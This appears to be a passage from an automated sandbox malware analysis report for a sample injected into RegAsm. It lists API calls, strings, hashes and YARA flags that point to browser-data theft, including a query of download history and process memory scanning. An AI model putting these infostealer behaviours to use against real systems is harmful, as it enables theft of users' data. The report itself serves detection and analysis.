                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: SELECT count(*) FROM %Q.'%q%s'$Wrong number of entries in %%%s table - expected %lld, actual %lld
                                                                                                                                                                                                                                        • API String ID: 0-3026403748
                                                                                                                                                                                                                                        • Opcode ID: a0b836656dfc988c743a3b63e04122b5b6ec561d8f79577cd1d0b64dea8d97b8
                                                                                                                                                                                                                                        • Instruction ID: da4a4184dc6056829cbbd40a8a81f076e46cdfe25552ff1f9e71625503d45240
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0b836656dfc988c743a3b63e04122b5b6ec561d8f79577cd1d0b64dea8d97b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3F044B6D002416BCB129A00EC42E2FB6E5BFC4E18F5D4A2CF08AA6660DB25F4549663
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3798474A,?,?,00000000,19E4D1CB,000000FF,?,19DF5B30,?,?,19DF5ADF,?), ref: 19DF5BF6
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 19DF5C08
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,19E4D1CB,000000FF,?,19DF5B30,?,?,19DF5ADF,?), ref: 19DF5C2A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                        • Opcode ID: 22be46488e487139def84197e18f64df335d371bb25a63286c214dd0793a5f67
                                                                                                                                                                                                                                        • Instruction ID: 7bbf97c8efc78425d58068f332b69d476097f87aca75ccede965b5946e254080
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22be46488e487139def84197e18f64df335d371bb25a63286c214dd0793a5f67
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5901A271D54669EFCB039FA4CD89FBEBBB8FB04B14F450925E816E2690DB799801CB40
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 004086F8
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040870C
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                        • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                                                        • API String ID: 2500673778-2241552939
                                                                                                                                                                                                                                        • Opcode ID: 9fe301e0c65639baad5394b31c11ebd942deb6a0fc9473ca69ca4494f92c0941
                                                                                                                                                                                                                                        • Instruction ID: 54a70b35f2e3bd0bead06bd516102e4005ef58b22266876870fc93898b796347
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fe301e0c65639baad5394b31c11ebd942deb6a0fc9473ca69ca4494f92c0941
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FC16F71805248EACB05EBA5D951BDDBBB86F19308F1441AEF506B3282DF785B0CC779
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • strlen.MSVCRT ref: 0040F255
                                                                                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 0040F282
                                                                                                                                                                                                                                          • Part of subcall function 0040F070: strlen.MSVCRT ref: 0040F07D
                                                                                                                                                                                                                                          • Part of subcall function 0040F070: strlen.MSVCRT ref: 0040F097
                                                                                                                                                                                                                                          • Part of subcall function 0040F070: strlen.MSVCRT ref: 0040F152
                                                                                                                                                                                                                                        • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,00000000,00000000,00000000,?,0040FC51,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF,00000FFF), ref: 0040F2CE
                                                                                                                                                                                                                                        • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040F3B4
                                                                                                                                                                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 0040F3C3
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: strlen$QueryVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3099930812-0
                                                                                                                                                                                                                                        • Opcode ID: 7c9b4c0b51c3ad2c2cdcaa8eef9269b8eebedcbf7ef5882b7756a5f9efe6eb19
                                                                                                                                                                                                                                        • Instruction ID: 067aa555f17516b8096591eac6b752a234b9d284ae0b983da437ecac591d64d5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c9b4c0b51c3ad2c2cdcaa8eef9269b8eebedcbf7ef5882b7756a5f9efe6eb19
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25519175A00118ABEB24DE69DD41ABFB3FAEB88714F14413AFD05E7380E638DD0187A5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memcmp.MSVCRT ref: 0040710B
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00407139
                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00407170
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                                                                                                                                                                                                        • String ID: @$v10
                                                                                                                                                                                                                                        • API String ID: 1400469952-24753345
                                                                                                                                                                                                                                        • Opcode ID: a8a8207e43a13d49a5b41ba8a5176773fcd3b2b4e8d669f2682076d218f8a936
                                                                                                                                                                                                                                        • Instruction ID: 1ad0ea3c5568345b5ddcad74f610c07972afb0beca4ce7e104c85093a37f4707
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a8a8207e43a13d49a5b41ba8a5176773fcd3b2b4e8d669f2682076d218f8a936
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C941AD71E04219EBCB14DF94DC01BAEB7B8AB44B14F10426EF915B72C0DBB86905CBA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __getptd.LIBCMT ref: 0041B83D
                                                                                                                                                                                                                                          • Part of subcall function 0041BA14: __getptd_noexit.LIBCMT ref: 0041BA17
                                                                                                                                                                                                                                          • Part of subcall function 0041BA14: __amsg_exit.LIBCMT ref: 0041BA24
                                                                                                                                                                                                                                        • __getptd.LIBCMT ref: 0041B854
                                                                                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 0041B862
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 0041B872
                                                                                                                                                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0041B886
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 938513278-0
                                                                                                                                                                                                                                        • Opcode ID: 5c3cacb0f7ad1bba531c55489a9aabdf1faedfa9b12995f3489998ccd8b0754d
                                                                                                                                                                                                                                        • Instruction ID: 838ad8bec1577741fb6ee50676f92d0b4110c482cf9a1a1505d817c5540a6f99
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c3cacb0f7ad1bba531c55489a9aabdf1faedfa9b12995f3489998ccd8b0754d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8AF062319417109BDA10BB666803BCE6290EF00B68F10421FE450672D2CB3C49C1CADE
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • fts5: syntax error near "%.*s", xrefs: 19D6751C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: fts5: syntax error near "%.*s"
                                                                                                                                                                                                                                        • API String ID: 0-498961494
                                                                                                                                                                                                                                        • Opcode ID: 4fd9179e7fbc45b3994ab1be125311358e536826ed44fd4d6dae8ac62c25c628
                                                                                                                                                                                                                                        • Instruction ID: 43e036312c48a9d6ad2aed309a1cd1508bab23feab357439b153cecf47aa4e5a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4fd9179e7fbc45b3994ab1be125311358e536826ed44fd4d6dae8ac62c25c628
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BDB1F174904385DFD312CF68C884B5ABBE4BF84388F19481DF8C9876A0E775E585CBA6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C81459
                                                                                                                                                                                                                                        • database corruption, xrefs: 19C81463
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19C81468
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                        • API String ID: 0-2528248365
                                                                                                                                                                                                                                        • Opcode ID: 0ffe5f84a0fd0667d0948727410c1a5c8afbf7c80e4972aa9a7ce08359795511
                                                                                                                                                                                                                                        • Instruction ID: 2073993f10ee5b0027dda009453dfe8a431d7db6500d449ff6db70e1ac244d20
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ffe5f84a0fd0667d0948727410c1a5c8afbf7c80e4972aa9a7ce08359795511
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8771F5B66043019FC705CF25D880A57BBE4BFC9358F1D8999E8C99B282D730E945CBA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                                                                        • API String ID: 0-3826999013
                                                                                                                                                                                                                                        • Opcode ID: 22ec354aa7430d7cc331956239ec7e73bc88b3676b56367b9847d2a737762931
                                                                                                                                                                                                                                        • Instruction ID: 5ae068f3d765c6db0292bf6c1e090cf5610a7a26e0fa3c7069620d562ae4556e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22ec354aa7430d7cc331956239ec7e73bc88b3676b56367b9847d2a737762931
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B161EEB26003419FE711DF65EC85A27B7E5AF84340F08896DE98797281EB30E854CB5A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C83092
                                                                                                                                                                                                                                        • database corruption, xrefs: 19C8309C
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19C830A1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                        • API String ID: 0-2528248365
                                                                                                                                                                                                                                        • Opcode ID: d4ab7580e41d322ad90dfd0db8ce83c93b1f04af6a71b66e1abb3b5c3c32a6d8
                                                                                                                                                                                                                                        • Instruction ID: 79e4e2bde5c857607cda3a352c7a83530bde78dae3001a5eb803221a063610e1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4ab7580e41d322ad90dfd0db8ce83c93b1f04af6a71b66e1abb3b5c3c32a6d8
